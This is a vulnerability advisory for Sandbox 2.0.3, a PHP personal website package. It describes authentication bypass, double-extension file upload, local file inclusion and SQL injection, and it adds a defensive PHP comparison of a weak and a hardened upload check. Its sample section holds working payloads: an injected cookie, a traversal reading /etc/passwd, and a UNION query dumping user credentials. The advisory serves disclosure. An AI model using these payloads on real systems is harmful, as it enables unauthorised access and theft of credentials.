Sandbox 2.0.3 Multiple Remote Vulnerabilities
Name              Sandbox
Vendor            http://www.iguanadons.net
Versions Affected 2.0.3
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-07-07
X. INDEX
I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
________________________
Sandbox is a personal website package that provides you
with a blog, image gallery, file downloads area, and the
ability to create miscellaneous custom webpages.
II. DESCRIPTION
_______________
Some parameters are not sanitised before being used in
SQL queries and in dangerous PHP functions.
The vulnerabilities are reported in version 2.0.3. Other
versions may also be affected.
III. ANALYSIS
_____________
Summary:
A) Authentication Bypass
B) Arbitrary File Upload
C) Local File Inclusion
D) SQL Injection
A) Authentication Bypass
________________________
The sandbox_pass cookie value in global.php is not
properly sanitised before being used in a SQL query.
Since this value is used for the authentication
system, the injection can be used to bypass it.
Successful exploitation requires that "magic_quotes_gpc"
is disabled.
B) Arbitrary File Upload
________________________
When a file is sent to blog.php (and also to profile.php)
a weak extension check is performed. The check consists of
splitting the file's name into substrings delimited by a
dot and checking whether the second substring's value is
present in the whitelist. This method works fine for a
file with a single extension, but if an attacker uses a
file with a double extension it no longer works. The
following is the affected code in blog.php:

$fname = $this->files['image_file']['tmp_name'];
// split on every dot: "evil.jpg.php" -> ["evil", "jpg", "php"]
$system = explode( '.', $this->files['image_file']['name'] );
// only the SECOND part is examined; anything after it is ignored
$system[1] = strtolower($system[1]);
if ( !preg_match( '/jpg|jpeg|png|gif/', $system[1] ) ) {
    // NO UPLOAD
} else {
    // UPLOAD
}

If the file's name is evil.jpg.php, $system[1] is "jpg" and
the file is accepted.
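The following is an added example, not Sandbox's own code: it puts the blog.php check (reduced to a function) beside a hardened replacement that uses the last extension, an exact whitelist match and an image-content check. The function names are assumed, and the sample file names are constructed for the demonstration; note that the unanchored regex also lets an extension such as "jpgphp" through.

```php
<?php
// Added example (not part of Sandbox). Compares the weak check from
// blog.php with a stricter one on constructed file names.

// Weak logic as in blog.php: only the SECOND dot-delimited part is
// examined and the regex is not anchored.
function weak_extension_ok(string $name): bool {
    $system = explode('.', $name);
    $ext = strtolower($system[1] ?? '');
    return (bool) preg_match('/jpg|jpeg|png|gif/', $ext);
}

// Hardened check (assumed replacement): LAST extension only, exact
// whitelist match, a single dot in the name, and, when the uploaded
// temp file is available, the content must parse as an image.
function strict_extension_ok(string $name, ?string $tmpPath = null): bool {
    $allowed = ['jpg', 'jpeg', 'png', 'gif'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    // "a.jpg.php" style names are refused outright so that web servers
    // which honour a second extension never see one.
    if (substr_count($name, '.') !== 1) {
        return false;
    }
    if ($tmpPath !== null && @getimagesize($tmpPath) === false) {
        return false;   // extension says image, content does not
    }
    return true;
}

// Constructed sample names: the first and last are legitimate images.
$samples = ['photo.jpg', 'evil.jpg.php', 'x.jpgphp', 'shell.php', 'PHOTO.PNG'];
foreach ($samples as $s) {
    printf("%-14s weak=%s strict=%s\n", $s,
        weak_extension_ok($s) ? 'accept' : 'reject',
        strict_extension_ok($s) ? 'accept' : 'reject');
}
```

Storing the accepted file under a server-generated name (and never under the client-supplied one) removes the remaining dependence on the file name entirely.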
C) Local File Inclusion
_______________________
The a parameter in admin.php is not properly sanitised
before being used in the require() PHP function.
This can be exploited to include arbitrary files from
local resources via directory traversal attacks and
URL-encoded NULL bytes.
D) SQL Injection
________________
The p parameter in modules/page.php is not properly
sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.
IV. SAMPLE CODE
_______________
A) Authentication Bypass
cookie: sandbox_pass = 1' OR '1'='1'#
cookie: sandbox_user = userid (1 for admin)
B) Arbitrary File Upload
Upload a file with a double extension.
C) Local File Inclusion
http://site/path/admin.php?a=../../../../../../../etc/passwd%00
D) SQL Injection
http://site/path/index.php?a=page&p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users
V. FIX
______
No fix.